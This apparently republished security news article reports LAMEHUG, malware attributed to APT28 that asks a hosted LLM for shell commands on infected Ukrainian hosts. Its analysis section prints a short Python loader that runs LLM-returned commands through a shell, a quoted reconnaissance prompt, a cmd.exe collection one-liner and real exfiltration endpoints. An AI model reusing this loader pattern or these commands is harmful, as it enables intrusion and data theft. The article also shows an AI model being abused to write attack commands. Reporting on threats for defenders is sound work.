First Known LLM-Powered Malware From APT28 Hackers Integrates AI Capabilities into Attack Methodology
The newly revealed LAMEHUG campaign signals a watershed moment for cyber-def: Russian state-aligned APT28 has fused a large language model (LLM) directly into live malware, allowing each infected host to receive tailor-made shell commands on the fly.
By invoking the Qwen2.5-Coder-32B-Instruct model through Hugging Face’s public API, the attackers sidestep traditional static payload constraints and achieve unprecedented flexibility.
LAMEHUG surfaced publicly on 17 July 2025, when Ukraine’s Computer Emergency Response Team (CERT-UA) issued an alert describing phishing e-mails that masqueraded as Ukrainian ministry correspondence and carried PyInstaller-compiled executables inside ZIP archives entitled “Додаток.pdf.zip.”
Once opened, a decoy PDF appears while the hidden binary executes in the background, ensuring the victim remains unaware of the breach.
CATO Networks analysts who reverse-engineered multiple samples quickly identified the malware’s hallmark: every binary embeds base64-encoded prompts that are sent verbatim to the cloud-hosted LLM, which then returns an executable command string tailored to the host environment.
The choice of a commodity AI interface confers two strategic advantages. First, outbound requests resemble legitimate application traffic, frustrating signature-based intrusion systems.
Second, prompt editing grants the operators instant control over reconnaissance depth and exfiltration scope without redeploying code, a boon for rapidly shifting operational requirements.
Early telemetry shows Ukrainian government workstations were the initial testbed, reinforcing long-standing observations that APT28 often pilots experimental tooling against Kyiv before wider use.
CERT-UA’s bulletin highlights the breadth of data stolen: system inventories, network layouts, Active Directory hierarchies, and recursively harvested Office, PDF, and text documents are staged in %PROGRAMDATA%info before exfiltration via either an SFTP tunnel to 144.126.202.227 or an HTTP POST to the compromised domain stayathomeclasses.com/slpw/up.php.
Because these destinations are ordinary protocols, network defenders have struggled to differentiate malicious uploads from benign traffic.
Infection Mechanism: AI-Driven Command Generation
When the lure executable launches, it spins a thread that executes a condensed Python loader:-
def LLM_QUERY_EX():
prompt = {'messages': [{'role': 'user',
'content': b64decode(prompt_b64_p1).decode()}],
'temperature': 0.1,
'model': 'Qwen/Qwen2.5-Coder-32B-Instruct'}
cmd = query_text(prompt)
subprocess. Run(cmd, shell=True,
stdout=subprocess. PIPE,
stderr=subprocess.STDOUT)
%20that%20the%20user%20sees%20while%20the%20malware%20is%20being%20executed%20(Source%20-%20CATO%20Networks).webp)
The first prompt instructs the LLM to “make a list of commands to gather computer, hardware, service, and network information … and append each result to C:Programdatainfoinfo.txt. Return only commands, without markdown.” The returned one-liner resembles:
cmd.exe /c "mkdir %PROGRAMDATA%info && systeminfo >> %PROGRAMDATA%infoinfo.txt && wmic cpu get /format:list >> %PROGRAMDATA%infoinfo.txt && ..."
A second prompt follows, ordering the recursive collection of Office, PDF, and TXT files from the user’s Documents, Downloads, and Desktop directories into the same staging folder.
By delegating command synthesis to the cloud model, the binary remains compact, and any blue-team attempt to pattern-match on hard-coded strings is defeated.
Unless defenders monitor outbound AI queries or impose least-privilege egress rules, LAMEHUG’s modular architecture guarantees the operators fresh system insight with every execution cycle.
Boost detection, reduce alert fatigue, accelerate response; all with an interactive sandbox built for security teams -> Try ANY.RUN Now
Source link